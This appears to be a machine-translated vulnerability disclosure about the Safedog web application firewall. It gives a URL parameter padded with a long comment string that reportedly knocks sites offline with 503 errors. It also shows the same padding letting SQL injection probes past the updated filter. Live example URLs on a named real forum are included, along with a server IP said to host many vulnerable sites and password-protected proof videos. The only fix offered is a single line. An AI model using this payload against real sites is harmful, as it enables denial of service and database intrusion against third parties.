Dongle DOS/injection bypass (can cause a large number of website DoS attacks)
1. Dos
A version of dongle does not properly handle parameters, resulting in website 503 Denial of Service. In addition, this version should be very common. A total of 15 websites with dogs can't be beaten
Add the following parameters to the url:
a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/&
Then... The station is 503.
Although safedog has released the latest version, it prevents the program from crashing.
This is in
But... What is the Upgrading Program on this server?
It is best to force upgrade!
2. Injection bypass (for dongle after upgrade)
A local dongle has just been downloaded, and it must be the latest. It is also the payload above, more than 421 a. The latest version can filter out the 'and' by bypass, however, if there are at least 421, they will be intercepted.
Although you can only bypass the "and" keyword, you can test whether the URL has been injected. For details, see the video in the proof. If you still have other bypass, you can also use it further.
Intercepted:
http://bbs.sdcms.cn/company_/post.aspx?threadid=14669&action=reply&page=1%20and%201=1 and 1=1
Let go:
http://bbs.sdcms.cn/company_/post.aspx?a=/*66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666*/&threadid=14669&action=reply&page=1%20and%201=1 and 1=1
So there are two cases in total: either being suspended or bypassed.
Http://dns.aizhan.com/125.76.231.7/
This is a safe dog server installed with this version. Almost all websites can be suspended. There are too many other examples. If D has been successful, there will be the official website of yunda, EMU, etc.
Video address: http://www.tudou.com/programs/view/SVUiRKopaTs/
Password 1234
The second video was blocked by Tudou and can only be placed on Baidu cloud.
Address: http://pan.baidu.com/s/1o6JyH42
Password: yn9q
Solution:
Filter again and force update